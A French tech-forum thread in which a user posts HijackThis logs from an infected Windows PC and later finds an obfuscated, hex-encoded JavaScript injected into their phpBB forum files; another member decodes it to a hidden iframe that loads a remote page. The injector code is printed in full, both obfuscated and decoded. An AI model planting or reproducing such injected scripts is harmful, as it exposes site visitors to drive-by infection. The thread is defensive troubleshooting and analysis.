08:02 Mot de passe oublié ?

1

On dirait Bugbear mais ni avast ni le fix de symantec ne me l'ont trouvé.

Je vous laisse un rapport HJT si vous voulez m'aider :

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Avast4\aswUpdSv.exe
C:\Program Files\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Avast4\ashMaiSv.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\system32\RunDLL32.exe
C:\WINDOWS\System32\alg.exe
C:\PROGRA~1\Avast4\ashDisp.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe
E:\eMule\bak\emule.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
C:\PROGRA~1\3M\PSNLite\PSNGive.exe
C:\Program Files\SpeedFan\speedfan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Outlook Express\msimn.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\MSN Messenger\usnsvc.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.boursorama.com/portefeuille/portefeuille.phtml?selectport=3780658517
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.files-ftp.com/~unicorni/phpBB2/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.ustart.org
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:8080
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {9f79e4dc-1f52-4777-aa30-f3bee45e548a} - C:\WINDOWS\system32\javsvc.dll (file missing)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar4.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar4.dll
O4 - HKLM\..\Run: [SoundFusion] RunDll32 hercplgs.cpl,BootEntryPoint
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [wzqhaa.exe] C:\DOCUME~1\Director\LOCALS~1\Temp\wzqhaa.exe
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Virtual PDF Printer] C:\Program Files\Virtual PDF Printer\VirtualPDFPrinter.exe
O4 - HKLM\..\Run: [Office SturtUp] osa9.exe
O4 - HKLM\..\Run: [CleanRam] C:\Program Files\Clean Ram\cleanram.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe] "1&1 Connexion directe" HIDE
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [ErrorSafeFree] "C:\Program Files\ErrorSafe Free\uers.exe" /min
O4 - HKCU\..\Run: [1&1 Connexion directe] "C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe" HIDE
O4 - HKCU\..\Run: [eMuleAutoStart] E:\eMule\bak\emule.exe -AutoStart
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')
O4 - Startup: AlibiMailer.lnk = C:\Program Files\AlibiMailer\AlibiMailer.exe
O4 - Startup: MBM 5.lnk = C:\Program Files\Motherboard Monitor 5\bak\MBM5.EXE
O4 - Startup: Perfy for Windows.lnk = C:\Program Files\Perfy\Perfy.exe
O4 - Startup: SpeedFan.lnk = C:\Program Files\SpeedFan\speedfan.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Lanceur de TrueSync.lnk = C:\Program Files\TrueSync\TSTool.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: Post-it® Software Notes Lite.lnk = C:\Program Files\3M\PSNLite\PsnLite.exe
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://c:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Program Files\CDPoker\casino.exe (file missing)
O9 - Extra 'Tools' menuitem: CDPoker - {A68FC757-51CF-4f3c-B13A-BFB8CA69BB99} - C:\Program Files\CDPoker\casino.exe (file missing)
O9 - Extra button: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Program Files\Noble Poker\casino.exe (file missing)
O9 - Extra 'Tools' menuitem: Noble Poker - {B723B1B8-9788-4684-ADA7-D1DB02E1D516} - C:\Program Files\Noble Poker\casino.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: Poker.com - {6FDD5236-C9F0-49ef-935D-385F5E21991A} - C:\Program Files\Poker.com\poker.exe (HKCU)
O14 - IERESET.INF: START_PAGE_URL=http://www.files-ftp.com/~unicorni/phpBB2/index.php
O16 - DPF: {09F1ADAC-76D8-4D0F-99A5-5C907DADB988} - http://cdn.drivecleaner.com/installdrivecleanerstart_fr.cab
O16 - DPF: {31B7EB4E-8B4B-11D1-A789-00A0CC6651A8} (Cult3D ActiveX Player) - http://www.cult3d.com/download/cult.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zone.msn.com/FR-FR/a-UNO1/GAME_UNO1.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1143580627937
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://go.divx.com/plugin/DivXBrowserPlugin.cab
O16 - DPF: {BB21F850-63F4-4EC9-BF9D-565BD30C9AE9} (a-squared Scanner) - http://ax.emsisoft.com/asquared.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab56986.cab
O16 - DPF: {F919FBD3-A96B-4679-AF26-F551439BB5FD} - http://cdn.downloadcontrol.com/files/installers/cab/Install-Errorprotector-Free.cab
O16 - DPF: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6} (IWinAmpActiveX Class) - http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{FA48B861-690C-4565-B413-00760C5A962F}: NameServer = 192.168.1.1,80.10.246.130
O20 - AppInit_DLLs:
O20 - Winlogon Notify: javsvc - javsvc.dll (file missing)
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Avast4\ashMaiSv.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Microsoft security update service (msupdate) - Unknown owner - c:\windows\system32\vhosts.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SNDSrvc.exe
O24 - Desktop Component 0: (no name) - http://image.fr.weather.com/web/maps/fr_FR/weather/forecast/france_outlook_day1_720_fr.jpg

--
End of file - 9846 bytes

2

3

Merci hehe


J'ai viré wzqhaa.exe, tjs pareil.
Je vais désinfecter wmiprvse (demain grin), avast! ne trouve rien à redire (quelle grosse daube quand même...).

J'ai fait un peu le ménage, le rapport est légèrement plus petit :
(Any idea ?)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Avast4\aswUpdSv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Avast4\ashServ.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\system32\RunDLL32.exe
C:\PROGRA~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\osa9.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe
E:\eMule\bak\emule.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\3M\PSNLite\PsnLite.exe
C:\Program Files\AlibiMailer\AlibiMailer.exe
C:\Program Files\SpeedFan\speedfan.exe
C:\PROGRA~1\3M\PSNLite\PSNGive.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Avast4\ashMaiSv.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\MSN Messenger\usnsvc.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.boursorama.com/portefeuille/portefeuille.phtml?selectport=3780658517
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.files-ftp.com/~unicorni/phpBB2/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.ustart.org
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:8080
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=userinit.exe,C:\WINDOWS\system32\ntos.exe,
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {9f79e4dc-1f52-4777-aa30-f3bee45e548a} - C:\WINDOWS\system32\javsvc.dll (file missing)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar4.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar4.dll
O4 - HKLM\..\Run: [SoundFusion] RunDll32 hercplgs.cpl,BootEntryPoint
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Virtual PDF Printer] C:\Program Files\Virtual PDF Printer\VirtualPDFPrinter.exe
O4 - HKLM\..\Run: [Office SturtUp] osa9.exe
O4 - HKLM\..\Run: [CleanRam] C:\Program Files\Clean Ram\cleanram.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe] "1&1 Connexion directe" HIDE
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [1&1 Connexion directe] "C:\Program Files\1&1\1&1 Connexion directe\EasyLogin.exe" HIDE
O4 - HKCU\..\Run: [eMuleAutoStart] E:\eMule\bak\emule.exe -AutoStart
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\ntos.exe (User 'Default user')
O4 - Startup: AlibiMailer.lnk = C:\Program Files\AlibiMailer\AlibiMailer.exe
O4 - Startup: MBM 5.lnk = C:\Program Files\Motherboard Monitor 5\bak\MBM5.EXE
O4 - Startup: SpeedFan.lnk = C:\Program Files\SpeedFan\speedfan.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: Lancement rapide d'Adobe Reader.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: Post-it® Software Notes Lite.lnk = C:\Program Files\3M\PSNLite\PsnLite.exe
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://c:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.files-ftp.com/~unicorni/phpBB2/index.php
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{FA48B861-690C-4565-B413-00760C5A962F}: NameServer = 192.168.1.1,80.10.246.130
O20 - AppInit_DLLs:
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Avast4\ashMaiSv.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Microsoft security update service (msupdate) - Unknown owner - c:\windows\system32\vhosts.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Fichiers communs\Symantec Shared\SNDSrvc.exe
O24 - Desktop Component 0: (no name) - http://image.fr.weather.com/web/maps/fr_FR/weather/forecast/france_outlook_day1_720_fr.jpg

-- End of file - 7437 bytes

4

adaware
spybot

une fois que t'as passé les deux, tu refais un rapport HJT
avatar
Webmaster du site Ti-FRv3 (et aussi de DevLynx)
Si moins de monde enculait le système, alors celui ci aurait plus de mal à nous sortir de si grosses merdes !
"L'erreur humaine est humaine"©Nil (2006) // topics/6238-moved-jamais-jaurais-pense-faire-ca

5

6

Passe à GNU/Linux et les virus et autres logiciels nocifs seront un problème du passé lointain. tongue http://fedoraproject.org
C'est la monoculture des systèmes d'exploitation qui cultive ces parasites.
avatar
Mes news pour calculatrices TI: Ti-Gen
Mes projets PC pour calculatrices TI: TIGCC, CalcForge (CalcForgeLP, Emu-TIGCC)
Mes chans IRC: #tigcc et #inspired sur irc.freequest.net (UTF-8)

Liberté, Égalité, Fraternité

7

Ça serait possible d'arrêter de voir ta pub absolument partout ? Tu as déjà un topic dédié à fedora, utilise-le.
avatar
All right. Keep doing whatever it is you think you're doing.
------------------------------------------
Besoin d'aide sur le site ? Essayez par ici :)

8

Kevin Kofler (./6) :
Passe à GNU/Linux et les virus et autres logiciels nocifs seront un problème du passé lointain. tongue.gif http://fedoraproject.org

Rappel de la charte :
Les publicités strictement informatives sont tolérées dès lors qu'elles ne font l'objet d'aucune répétition (spam)
et qu'elles n'ont pas de caractère insidieux ou manipulateur ; de la même manière, les liens de parrainages sont strictement interdits.

EDIT: cross
avatar
fabetal_ > Hier, je me suis fait monter par un pote
redangel > et en chevals, ça donne quoi?
Nil> OMG I think I'm gay

9

10

vince (./4) :
adaware
spybot

une fois que t'as passé les deux, tu refais un rapport HJT

Sachant qu'avec spybot tu as un mode expert qui te permet de voir quels sont les programmes lancés au démarrage (et bien souvent les spywares y sont visibles)
avatar
<<< Kernel Extremis©®™ >>> et Inventeur de la différence administratif/judiciaire ! (©Yoshi Noir)

<Vertyos> un poil plus mais elle suce bien quand même la mienne ^^
<Sabrina`> tinkiete flan c juste qu'ils sont jaloux que je te trouve aussi appétissant

11

Merci.
...........mon problème a disparu \o/
(Mais je ne sais pas vraiment comment grin)
Kevin Kofler (./6) :
Passe à GNU/Linux et les virus et autres logiciels nocifs seront un problème du passé lointain.
Un jour les utilisateurs de windows vont se vexer et sortir des millions de virus pour GNU/Linux angry

12

Arf.............j'ai plus le problème dans IE, word & notepad mais toujours dans outlook & messenger sorry

Je nettoie un peu et je refais un rapport.

13

14

ça serait pas un coup du paramétrage des options de langues ou d'accessibilité ?
avatar
Webmaster du site Ti-FRv3 (et aussi de DevLynx)
Si moins de monde enculait le système, alors celui ci aurait plus de mal à nous sortir de si grosses merdes !
"L'erreur humaine est humaine"©Nil (2006) // topics/6238-moved-jamais-jaurais-pense-faire-ca

15

Youhouuuuuuuu, ça marche normalement !
(Enfin j'ai l'impression hum)
vince (./14) :
ça serait pas un coup du paramétrage des options de langues ou d'accessibilité ?

Nan.

16

Ca recommence angry Mais je crois que j'ai trouvé le problème. Ca vous dit qqch ça ?
<script>function v47741b7a90e83(v47741b7a90e99){ function v47741b7a90eb0 () {return 16;} return(parseInt(v47741b7a90e99,v47741b7a90eb0()));}function v47741b7a90f08(v47741b7a90f1b){ function v47741b7a90f56 () {return 2;} var v47741b7a90f2e='';for(v47741b7a90f40=0; v47741b7a90f40<v47741b7a90f1b.length; v47741b7a90f40+=v47741b7a90f56()){ v47741b7a90f2e+=(String.fromCharCode(v47741b7a90e83(v47741b7a90f1b.substr(v47741b7a90f40, v47741b7a90f56()))));}return v47741b7a90f2e;} document.write(v47741b7a90f08('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3065643331373732656163207372633D5C27687474703A2F2F737461726C6F6769632E696E2F746F726E6161646F2F636F756E742E7068703F6F3D313F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313334393336292B273264303932306131355C272077696474683D333334206865696768743D343034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

17

Tu as trouvé ça où ?

Voilà une version lisible de ce script : 
function v47741b7a90e83(v47741b7a90e99){
	function v47741b7a90eb0 () {return 16;}
	return(parseInt(v47741b7a90e99,v47741b7a90eb0()));
}

=> parseInt(arg1, 16)


function v47741b7a90f08(v47741b7a90f1b){
	function v47741b7a90f56 () {return 2;}
	var v47741b7a90f2e='';
	for(v47741b7a90f40=0; v47741b7a90f40 < v47741b7a90f1b.length; v47741b7a90f40+=v47741b7a90f56()) {
		v47741b7a90f2e+=(String.fromCharCode(v47741b7a90e83(v47741b7a90f1b.substr(v47741b7a90f40, v47741b7a90f56()))));
	}
	return v47741b7a90f2e;
}

=> function decode(arg1){
	var res = '';
	for(i=0; i < arg1.length; i+=2) {
		res += String.fromCharCode(parseInt(arg1.substr(i, 2), 16));
	}
	return res;
}

document.write(v47741b7a90f08('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3065643331373732656163207372633D5C27687474703A2F2F737461726C6F6769632E696E2F746F726E6161646F2F636F756E742E7068703F6F3D313F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313334393336292B273264303932306131355C272077696474683D333334206865696768743D343034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

=> document.write(decode('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3065643331373732656163207372633D5C27687474703A2F2F737461726C6F6769632E696E2F746F726E6161646F2F636F756E742E7068703F6F3D313F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313334393336292B273264303932306131355C272077696474683D333334206865696768743D343034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

==> document.write('<SCRIPT>window.status=\'Done\';document.write(\'<iframe name=0ed31772eac src=\\'http://%URL_ENLEVÉE%/tornaado/count.php?o=1?\'+Math.round(Math.random()*134936)+\'2d0920a15\\' width=334 height=404 style=\\'display: none\\'></iframe>\')</SCRIPT>');
avatar

18

A la place de certains fichiers de mon forum.
(J'ai rechopé les doubles accents ce soir en m'y connectant...)

19

Ah oui, j'ai évidemment besoin d'aide pour m'en débarrasser grin
(J'ai fait n'importe quoi pendant deux jours les deux premières fois, me souviens plus de quoi trigic)

20

tu serais pas une victime d'une faille de phpbb par hasard ?
avatar
Webmaster du site Ti-FRv3 (et aussi de DevLynx)
Si moins de monde enculait le système, alors celui ci aurait plus de mal à nous sortir de si grosses merdes !
"L'erreur humaine est humaine"©Nil (2006) // topics/6238-moved-jamais-jaurais-pense-faire-ca

21

Le forum en est probablement victime, oui (phpBB3 RC7...).
Et moi je suis victime de mon forum mourn

Edit : quelqu'un qui parle le script peut me confirmer que cette saloperie est là pour emmerder mes accents ?

22

Ça m'a l'air d'être d'un script de pub tout simplement.
avatar
Mes news pour calculatrices TI: Ti-Gen
Mes projets PC pour calculatrices TI: TIGCC, CalcForge (CalcForgeLP, Emu-TIGCC)
Mes chans IRC: #tigcc et #inspired sur irc.freequest.net (UTF-8)

Liberté, Égalité, Fraternité

23

Que signifie
for(v47741b7a90f40=0; v47741b7a90f40 < v47741b7a90f1b.length; v47741b7a90f40+=v47741b7a90f56()) {
v47741b7a90f2e+=(String.fromCharCode(v47741b7a90e83(v47741b7a90f1b.substr(v47741b7a90f40, v47741b7a90f56()))));
} return v47741b7a90f2e;
?

24

Thepro (./17) :
for(i = 0; i < arg1.length; i += 2) {  
	res += String.fromCharCode(parseInt(arg1.substr(i, 2), 16));
}
return res;
wink
C'est pour convertir les valeurs hexadécimales en caractères.
avatar

25

Oui mais quel caractère ?
(pas un ^ ou un ¨ ? grin)

26

Le script n'est pas la cause de tes problèmes d'accent, ça ne fait qu'ajouter cet autre script dans la page : 
window.status='Done';
document.write('<iframe name=0ed31772eac src=\'http://%URL_ENLEVÉE%/tornaado/count.php?o=1?'+Math.round(Math.random()*134936)+'2d0920a15\' width=334 height=404 style=\'display: none\'></iframe>')
Mais ce script ajoute une pub, ou en fait, je ne sais pas ce qu'il y a sur la page affichée, car mon antivirus empêche son chargement. Donc c'est peut-être la cause de tes problèmes smile
avatar

27

Ca affichait une page blanche confus
(J'ai viré ça)



Sinon j'ai pas tout bien compris...
Thepro (./26) :
Le script n'est pas la cause de tes problèmes d'accent
Thepro (./26) :
Donc c'est peut-être la cause de tes problèmes smile.gif

28

Ce que j'ai voulu dire, c'est que ce script ne fait qu'ajouter un script dans ta page. Et ce second script ajoute une pub (ou ce qui pourrait y ressembler). Et c'est dans cette pub qu'il y a l'envoi d'un virus qui lui, pose problème grin

Enfin, ce n'est pas le premier script qui lit ton clavier et envoie deux fois la même touche smile
avatar

29

C'est pas une pub (je pense pas), ça n'affichait rien.

30

forcement "display:none"

(edit: oups désolé pour le remontage, bon c'est pas trop vieux comme topic mais bon)
avatar
Proud to be CAKE©®™


GCC4TI importe qui a problème en Autriche, pour l'UE plus et une encore de correspours nucléaire, ce n'est pas ytre d'instérier. L'état très même contraire, toujours reconstruire un pouvoir une choyer d'aucrée de compris le plus mite de genre, ce n'est pas moins)
Stalin est l'élection de la langie.
Aide Charte Contacts Crédits Réalisé avec yAronet 93 ms